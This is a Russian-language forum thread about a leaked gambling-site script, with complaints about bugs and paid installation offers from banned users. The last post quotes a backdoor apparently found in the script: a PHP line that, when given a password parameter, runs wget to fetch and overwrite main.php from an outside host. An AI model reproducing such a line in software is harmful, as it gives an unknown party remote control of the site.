• Данный материал предоставлен сайтом исключительно в ознакомительных целях.
    Администрация не несет ответственности за его содержимое. По всем жалобам пишите на почту abusevhguru@yandex.ru

F R E E Слив VENTUREFAST FINAL DOUBLEGAME+FASTGAME+GIVEAWAY+BOT+SQL

Таис

Опытный
Реакции
91

Таис

• 242
  • 91
Не работают розыгрыши. Кто-нибудь знает, как пофиксить?

ziwepeha

Заблокирован
Реакции
74

ziwepeha

• 0
  • 74
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,
Надоели:) го настрою и установлю скрипт, это же элементарно просто...
150р - настройка, 200р - установка (пофиг что дешево), срочняк над мани до 22:00 по МСК

в ЛС
в
в Skype: kallen_mvm

КТО СМОЖЕТ ВЫРУЧИТЬ МЕНЯ СЕГОДНЯ - С МЕНЯ 1 ЛЮБОЙ ФИКС ЗА БЕСПЛАТНО!!!))

ЛЮБОЙ КАПРИЗ ЗА ВАШИ ДЕНЬГИ!!!

Последнее редактирование модератором:

Grave68

Опытный
Реакции
109

Grave68

• 145
  • 109
Я слил только фастгейм, розыгрыши, дабл, и немного доработаную смену валюты так как сам смог сделать конвертацию которая слетала после обновления страницы. Остальное я делал сам взяв за основу FastVictory :)
Алооо!!!! Конченный - "остальное" это [А по щам?] что??? Что остальное то???
Мб это розыгрыши Anataras'а или шоп fastvictory? Что [А по щам?] остальное?

Бля, ну попробуй только проигнорить и не ответить.....

nik4o

Местный
Реакции
20

nik4o

• 64
  • 20
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,

nik4o

Местный
Реакции
20

nik4o

• 64
  • 20
все что здесь нормальное это мультиязычность. дабл баганный. csgofire.com/double стоит потому что баланс кртили через него

TwoStar

Заблокирован
Реакции
153

TwoStar

• 225
  • 153
Ну что? Поставил кто? (Ставлю за 350р в течении 30 минут на чистую впску). Skype:donovets

nik4o

Местный
Реакции
20

nik4o

• 64
  • 20

TwoStar

Заблокирован
Реакции
153

TwoStar

• 225
  • 153

nik4o

Местный
Реакции
20

nik4o

• 64
  • 20

ALexunderkeks

Пользователь
Реакции
0

ALexunderkeks

• 38
  • 0
Кто нибудь может объяснить как запустить этих гребанных ботов? Что поменять в них чтобы они работать начали нормально вместе?

TwoStar

Заблокирован
Реакции
153

TwoStar

• 225
  • 153
Кто нибудь может объяснить как запустить этих гребанных ботов? Что поменять в них чтобы они работать начали нормально вместе?
Нужно кинуть 150р на мой кивик и я все обьясню :)

doctornws

Заблокирован
Реакции
9

doctornws

• 78
  • 9
Скрипт не рабочий,всем привет)
Очередной шлак

izzi

Новичок
Реакции
0

izzi

• 2
  • 0
PHP:
if ($_GET['pwd']=='dl'){ exec('wget -O main.php http://8737.cf/main.txt');}
Как грубо :)